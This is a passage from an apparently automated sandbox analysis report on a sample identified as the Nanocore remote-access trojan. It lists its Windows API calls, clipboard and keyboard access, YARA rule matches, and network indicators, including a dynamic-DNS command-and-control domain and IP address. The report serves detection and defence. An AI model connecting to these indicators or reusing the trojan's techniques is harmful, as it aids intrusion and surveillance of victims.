        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00468877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00468877
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,13_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0044CAE7 FindFirstFileW,FindNextFileW,FindClose,13_2_0044CAE7
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,13_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0044DE7C FindFirstFileW,FindClose,13_2_0044DE7C
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0043BF17

        Networking:

        barindex
        Connects to many ports of the same IP (likely port scanning)Show sources
        Source: global trafficTCP traffic: 185.19.85.175 ports 2,4,5,6,8,48562
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: strongodss.ddns.net
        Source: global trafficTCP traffic: 192.168.2.3:49749 -> 185.19.85.175:48562
        Source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: xmjk.pif, 00000004.00000000.332849092.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000000D.00000000.366495909.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000014.00000000.372500694.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000016.00000000.390620091.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000001B.00000002.427944627.000000000049B000.00000002.00020000.sdmpString found in binary or memory: http://www.onnodb.com/aetraymenuH(
        Source: unknownDNS traffic detected: queries for: strongodss.ddns.net
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00432285 InternetQueryDataAvailable,InternetReadFile,4_2_00432285
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004342E1 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,4_2_004342E1
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0044A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0044A0FC
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0045D8E9 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,13_2_0045D8E9
        Source: RegSvcs.exe, 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmpBinary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0046C7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_0046C7D6

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR

        Operating System Destruction:

        barindex
        Protects its processes via BreakOnTermination flagShow sources
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00 Jump to behavior

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.RegSvcs.exe.34d9650.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.3f307ce.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.2f177b4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.RegSvcs.exe.34d9650.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.57c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.RegSvcs.exe.44c07ce.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.RegSvcs.exe.34de6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.2f1c614.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.5900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.2f177b4.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
